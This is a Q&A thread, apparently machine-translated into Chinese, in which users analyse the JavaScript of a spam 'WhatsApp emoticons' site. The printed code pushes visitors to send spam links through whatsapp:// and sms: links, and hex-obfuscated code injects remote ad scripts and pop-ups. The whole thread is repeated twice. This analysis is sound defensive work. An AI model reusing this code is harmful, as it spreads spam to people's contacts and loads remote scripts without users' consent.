恶意网站:破译代码?
Malicious website: decyphering the code?
这是一个恶意网站,它试图向人们发送垃圾邮件以进一步传播他们的网站,这也会导致出现广告 - 我建议启用 noscript。
http://trucchiios.com/emoticon/index_en.php
现在我这里有当你按下 whatsapp 大按钮时执行的代码,但它有什么作用?
c = 0;
var image;
function fn1(x)
{
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// some code..
++c;
if (c <= 6)
{
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
if (c == 2) {
ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
} else if (c == 4) {
ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
}
} else if (c <= 10) {
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
if (c == 7) {
ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
}
var head = document.getElementsByTagName('head').item(0);
var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);
} else
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
function fn3(x) {
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// some code..
++c;
if (c <= 10) {
window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
} else
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
function fn2(x) {
if (c >= 10)
{
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else
{
window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited " + c + " contacts.");
}
}
var n = 300,
t = setInterval(function() {
$("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
}, 1e3);
我只想有人告诉我它的作用。我怀疑这只是垃圾广告,并非真正的恶意软件,但请检查一下。
它添加 javascript 文件:http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]。
完整代码:
var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);
"Normal"代码:
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);
网页.../adscript.php?pid=8673&ord=[timestamp],使用缓存头只显示一次。在第一个视图中,您得到:
if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
else{ document.asm_max_2398++; }
var asm_ex = false;
var asm_ex_all = false;
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
if(asm_ex_all){}
else if(!asm_ex && document.asm_max_2398 <= 1)
{
document.write('');
(function ()
{
var s, r, t;
r = false;
s = document.createElement("script");
s.type = "text/javascript";
s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
s.readySet = false;
s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
function asm_pop_asmfls8673x5396511y1447611443()
{
r = true;
var asm_pop_options = new Object()
asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
asm_pop_options.breite = "1920";
asm_pop_options.hoehe = "1080";
asm_pop_options.links = "0";
asm_pop_options.oben = "0";
asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
asm_pop_options.layeronly = false;
asm_pop_options.popunder = false;
asm_pop_options.canlayer = false;
asm_pop_options.clickpop = true;
asm_pop_options.close = "0";
asm_pop_options.booLoad = true;
asm_pop_options.loadTime = "2";
asm_pop_options.closeTime = "0";
asm_pop_options.cookdom = "sprintrade.com";
asm_pop_options.poptitle = "";
asm_pop_options.popdomain = "http://cdn.adspirit.de";
asm_pop_options.kid = "2398";
asm_pop_options.pid = "8673";
asm_pop_options.id = "asmfls8673x5396511y1447611443";
window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
}
var ss = document.getElementsByTagName("script");
if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
else if(document.body){document.body.appendChild(s);}
})()
document.write('');
}
else
{
document.write('<scr'+'ipt type="text\/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><\/scr'+'ipt>');
}
获得后:
document.write('');
脚本只制作一次到运行.
语言是Javascript。
这些与 mailto: 链接(调用电子邮件的默认应用程序)几乎相同,但在这种情况下,它调用默认的 WhatsApp 应用程序或 SMS 应用程序(取决于 OS) 然后发送广告。
(%0D%0A 是 CRLF 的非转义编码字符串)
不过话又说回来,如果你说它是一个大 "WhatsApp" 按钮,你希望它做什么?
似乎是这段代码导致了上周收到的垃圾邮件数量不断增加。我很确定此代码正在使用 Whatsapp web 向恶意网站发送 link:
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");
如果使用移动设备,
if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
还尝试发送短信:
"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");
执行此代码时会加载其他一些插件站点。这段代码似乎执行了一些其他任务,但很难知道。该脚本是使用 Javascript.
编写的
这是一个恶意网站,它试图向人们发送垃圾邮件以进一步传播他们的网站,这也会导致出现广告 - 我建议启用 noscript。
http://trucchiios.com/emoticon/index_en.php
现在我这里有当你按下 whatsapp 大按钮时执行的代码,但它有什么作用?
c = 0;
var image;
function fn1(x)
{
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// some code..
++c;
if (c <= 6)
{
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
if (c == 2) {
ga('send', 'event', 'WhatsApp', '1+ share', 'Emoticon EN');
} else if (c == 4) {
ga('send', 'event', 'WhatsApp', '3+ shares', 'Emoticon EN');
}
} else if (c <= 10) {
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
if (c == 7) {
ga('send', 'event', 'WhatsApp', 'more than 7 shares', 'Emoticon EN');
}
var head = document.getElementsByTagName('head').item(0);
var _0xc631 = ["\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x68\x74\x74\x70\x3A\x2F\x2F\x61\x64\x73\x2E\x73\x70\x72\x69\x6E\x74\x72\x61\x64\x65\x2E\x63\x6F\x6D\x2F\x61\x64\x73\x63\x72\x69\x70\x74\x2E\x70\x68\x70\x3F\x70\x69\x64\x3D\x38\x36\x37\x33\x26\x6F\x72\x64\x3D\x5B\x74\x69\x6D\x65\x73\x74\x61\x6D\x70\x5D", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);
} else
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
function fn3(x) {
if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) {
// some code..
++c;
if (c <= 10) {
window.open("sms:?body=Check out the new WhatsApp animated emoticons :P %0D%0AYou’re going to burst out laughing!%0D%0A http://xy7.co/emoticon %0D%0A %0D%0A %0D%0A %0D%0A15/11/15 : 17:44:07", "_self");
} else
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else {
window.alert("Please invite via your mobile browser");
}
}
function fn2(x) {
if (c >= 10)
{
window.open("http://ads.sprintrade.com/adframe.php?pid=12649")
} else
{
window.alert("To activate the new emoticons you have to invite at least 10 contacts. 10 friends or 3 groups. So far you've only invited " + c + " contacts.");
}
}
var n = 300,
t = setInterval(function() {
$("#countdown").text(n--), -1 == n && window.open("http://ads.sprintrade.com/adframe.php?pid=12649", "_self") & clearInterval(t)
}, 1e3);
我只想有人告诉我它的作用。我怀疑这只是垃圾广告,并非真正的恶意软件,但请检查一下。
它添加 javascript 文件:http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]。
完整代码:
var _0xc631 = ["script", "createElement", "type", "text/javascript", "src", "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]", "appendChild"]
var script = document[_0xc631[1]](_0xc631[0]);
script[_0xc631[2]] = _0xc631[3];
script[_0xc631[4]] = _0xc631[5];
head[_0xc631[6]](script);
"Normal"代码:
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ads.sprintrade.com/adscript.php?pid=8673&ord=[timestamp]";
head.appendChild(script);
网页.../adscript.php?pid=8673&ord=[timestamp],使用缓存头只显示一次。在第一个视图中,您得到:
if(typeof(document.asm_excl) == "undefined"){ document.asm_excl = new Array(); } document.asm_excl = document.asm_excl.concat(String("").split("|")); if(typeof(document.asm_max_2398) == "undefined"){ document.asm_max_2398 = 1; }
else{ document.asm_max_2398++; }
var asm_ex = false;
var asm_ex_all = false;
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "2398"){asm_ex = true; break;}}
for(var asm_i=0; asm_i<document.asm_excl.length; asm_i++) { if(document.asm_excl[asm_i] == "w21272" || document.asm_excl[asm_i] == "p8673"){asm_ex_all = true; break;}}
if(asm_ex_all){}
else if(!asm_ex && document.asm_max_2398 <= 1)
{
document.write('');
(function ()
{
var s, r, t;
r = false;
s = document.createElement("script");
s.type = "text/javascript";
s.src = "http://cdn.adspirit.de/banner/asmpop_async.js";
s.readySet = false;
s.onload = function (){if(!this.readySet){this.readySet=true;asm_pop_asmfls8673x5396511y1447611443();}};
s.onreadystatechange = function (){if ( !this.readySet && (!this.readyState || this.readyState == "complete")){this.readySet=true; asm_pop_asmfls8673x5396511y1447611443();}};
function asm_pop_asmfls8673x5396511y1447611443()
{
r = true;
var asm_pop_options = new Object()
asm_pop_options.url = "http://ads.sprintrade.com/adpop.php?tz=1447611443715312&pid=8673&kid=2398&wmid=28565&wsid=21272&uid=9&ord=%5Btimestamp%5D&wpcn=asmpvx8547661447611443";
asm_pop_options.breite = "1920";
asm_pop_options.hoehe = "1080";
asm_pop_options.links = "0";
asm_pop_options.oben = "0";
asm_pop_options.ops = "alwaysLowered=0,alwaysRaised=1,dependent=0,fullscreen=1,location=0,menubar=0,resizable=0,scrollbars=1,status=0,titlebar=0,toolbar=0,disableFullscreen=0,disableClose=0,disableBorder=0";
asm_pop_options.layeronly = false;
asm_pop_options.popunder = false;
asm_pop_options.canlayer = false;
asm_pop_options.clickpop = true;
asm_pop_options.close = "0";
asm_pop_options.booLoad = true;
asm_pop_options.loadTime = "2";
asm_pop_options.closeTime = "0";
asm_pop_options.cookdom = "sprintrade.com";
asm_pop_options.poptitle = "";
asm_pop_options.popdomain = "http://cdn.adspirit.de";
asm_pop_options.kid = "2398";
asm_pop_options.pid = "8673";
asm_pop_options.id = "asmfls8673x5396511y1447611443";
window.asm_pop_asmfls8673x5396511y1447611443 = new asm_popup(asm_pop_options);
}
var ss = document.getElementsByTagName("script");
if(ss.length>0){ ss[ss.length-1].parentNode.insertBefore(s, ss[ss.length-1].nextSibling); }
else if(document.body){document.body.appendChild(s);}
})()
document.write('');
}
else
{
document.write('<scr'+'ipt type="text\/javasc'+'ript" language="JavaSc'+'ript" src="http://ads.sprintrade.com/adscript.php?pid=8673&hr=1&nrc=1&&wpcn=asmpvx8547661447611443&ex=|2398&ord='+(new Date()).getTime()+'"><\/scr'+'ipt>');
}
获得后:
document.write('');
脚本只制作一次到运行.
语言是Javascript。
这些与 mailto: 链接(调用电子邮件的默认应用程序)几乎相同,但在这种情况下,它调用默认的 WhatsApp 应用程序或 SMS 应用程序(取决于 OS) 然后发送广告。
(%0D%0A 是 CRLF 的非转义编码字符串)
不过话又说回来,如果你说它是一个大 "WhatsApp" 按钮,你希望它做什么?
似乎是这段代码导致了上周收到的垃圾邮件数量不断增加。我很确定此代码正在使用 Whatsapp web 向恶意网站发送 link:
window.open("whatsapp://send?text=Check out the new WhatsApp animated emoticons :P [...]", "_self");
如果使用移动设备,
if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) ) {
还尝试发送短信:
"sms:?body=Check out the new WhatsApp animated emoticons :P [...]", "_self");
执行此代码时会加载其他一些插件站点。这段代码似乎执行了一些其他任务,但很难知道。该脚本是使用 Javascript.
编写的